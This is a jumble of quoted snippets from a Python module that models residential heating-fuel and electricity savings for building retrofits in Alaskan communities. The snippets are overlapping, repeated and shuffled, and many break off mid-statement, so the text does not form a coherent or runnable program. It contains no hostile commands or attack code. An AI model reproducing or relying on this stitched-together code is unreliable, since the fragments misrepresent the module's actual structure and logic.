self.proposed_kWh_cost", "Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year)", "savings created by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year)", "Reduction\"]) total = area * EUI # the one in each of these", "HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted", "(cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential:", "Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass", "for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\", "Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post", "project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost", "offset heating fuels. The cost to retrofit each home is also calculated. Parameters", "kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con):", "b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost =", "HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption -", "(MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating", "heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0", "price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price +", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption", "directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices +", "self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP*", "self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu =", "See also -------- aaem.community_data : community data module, see information on CommunityData Object", "/ 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf)", "self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced", "of units that have not been retrofit as of 2010, the performance improvements", "rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI", "must be a known Heat Recovery project for this component to run. Parameters", "float initial heating oil consumption init_wood : float initial heating cordwood consumption init_gas", "Energy Model: This module estimates the potential improvements to heating efficiency of residential", "post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost", "save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters ---------- directory", "Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year)", "project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH", "import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy", "(gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural", "savings ($/year) are the difference in the base and proposed fuel costs \"\"\"", "r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords", "b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price", "yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con", "Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric", "\\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler", "def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a house.", "]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()]", "electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per", "baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index =", "Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\":", "consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float % of", "total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH", "optional Scalers to adjust normal run variables. See note on accepted scalers Attributes", "6000 \"\"\" # 500 average energy use, 12 months in a year. That's", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction *", "module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag", "= \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption =", "= b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption *", "= os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\")", "\"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ----------", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction *", "use, 12 months in a year. That's where the 6000.0 # comes from.", "Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential:", "#~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\", "LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil", "corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption", "forecast for estimating future values initial value: forecast cd : dictionary general data", "lists reason for failure if run == False Notes ----- Accepted scalers: capital", "baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline", "= self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec", "\"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\":", "np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0", "s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec =", "}, years) try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential:", "self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction", "Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\":", "self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community',", "* constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption", "float savings in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu:", "Avg. EUI Reduction\"]) total = area * EUI # the one in each", "try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil", "\\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details(", "electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ##", "\"\"\" import numpy as np from pandas import DataFrame import os from aaem.components.annual_savings", "Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast : Forecast", "import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings):", "comes from. con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses", "(self, directory): \"\"\"Save the component output csv in directory Parameters ---------- directory :", "self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\", "conversion factor Returns ------- float: fuel consumed for a type of fuel \"\"\"", "in heating cordwood consumption savings_gas : float savings in natural gas fuel consumption", "self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\", ": np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption", "print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI", "= np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction =", "consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values", "self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per", "per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\", "\"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag)", ": float savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\"", "component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if", "self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price", "\"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post", "(base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns", "residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH =", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt", "Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\":", "community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption =", "= community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric", ": float savings in heating cordwood consumption savings_gas : float savings in natural", "fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural", "\\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption *", "year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) /", "'Residential Buildings' section of community_data See also -------- aaem.community_data : community data module,", ": float savings in heating oil consumption savings_wood : float savings in heating", "Houses to retrofit was negative, setting to 0\" ) ## % as decimal", "UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model:", "year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] #", "#~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses", "prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price", "def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ----------", "baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption =", "= self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption", "(self): \"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings :", "rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\", "\"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get", "gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility", "np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns", "\"\"\" Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~", "self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\", "this component to run. Parameters ---------- scalers : dictionary of valid scalers, optional", "= np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH,", "from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import", "(Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG,", "def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the", "messages prerequisites : dictionary of components, optional prerequisite component data this component has", "prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial", "np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data", "\"\"\"Save the component output csv in directory Parameters ---------- directory : path output", "baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating", "total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF *", "base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) *", "component to run. Parameters ---------- scalers : dictionary of valid scalers, optional Scalers", "* LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit", "baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd", "of residential buildings (homes). Consumption and savings are based on the number of", "information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None,", "HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas =", "self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes", "Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating", "self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save", "if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest", "Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil,", "Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating", "Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost,", "'_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end", "community. Initial value: 'community' section of community_data comp_specs : dictionary component specific data", "self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt =", "\"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price", "area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction", "* \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH", "oil consumption savings_wood : float savings in heating cordwood consumption savings_gas : float", ": np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF", "baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per", "\\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate", "fuel consumption init_LP : float initial propane consumption init_kWh : float initial electric", "= self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption", "self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12", "fuel_amnt: float % of fuel used total_consumption : float total consumption for residential", "self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating", "= np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat", "self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH", "months in a year. That's where the 6000.0 # comes from. con_threshold =", "#~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption", "\"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF : float", "len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption *", "Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All", "constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\", "LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed", "Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year)", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) /", "if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption()", "Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(),", "(self): \"\"\"Estimate the # of households for the first year of the project", "import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable", "HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt:", "by fuel from the total consumption Parameters ---------- fuel_amnt: float % of fuel", "constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf", "= self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost", "% as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area", ": bool True in the component runs to completion, False otherwise reason :", "- r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP", "self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings()", "Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas", "\\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption *", "completion, False otherwise reason : string lists reason for failure if run ==", "\"\"\"Estimate the # of households for the first year of the project Attributes", "consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH =", "savings_LP : float savings in propane consumption savings_kWh : float savings in electric", "\"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years,", "community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary", "All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\"", "[cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas", "\"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\",", "= True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1", "self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted +=", "a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites :", "a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year).", "scalers, optional Scalers to adjust normal run variables. See note on accepted scalers", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0", "* self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf)", "if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood", "the total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat =", "proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption", "Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating", "self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start", "baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int)", "see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag =", "r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost", "\"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\":", "self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs", "Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas", "(cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating", "output csv in directory Parameters ---------- directory : path output directory \"\"\" if", "monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average", "initial propane consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data']", "\"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption", "forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data :", "np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) *", "project for this component to run. Parameters ---------- scalers : dictionary of valid", "df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post", "Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post", "Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio,", "a community. Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data", "baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption", "Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year]", "self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption", "= (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year:", "community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices')", "------------------------------------- \"\"\" import numpy as np from pandas import DataFrame import os from", "HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel 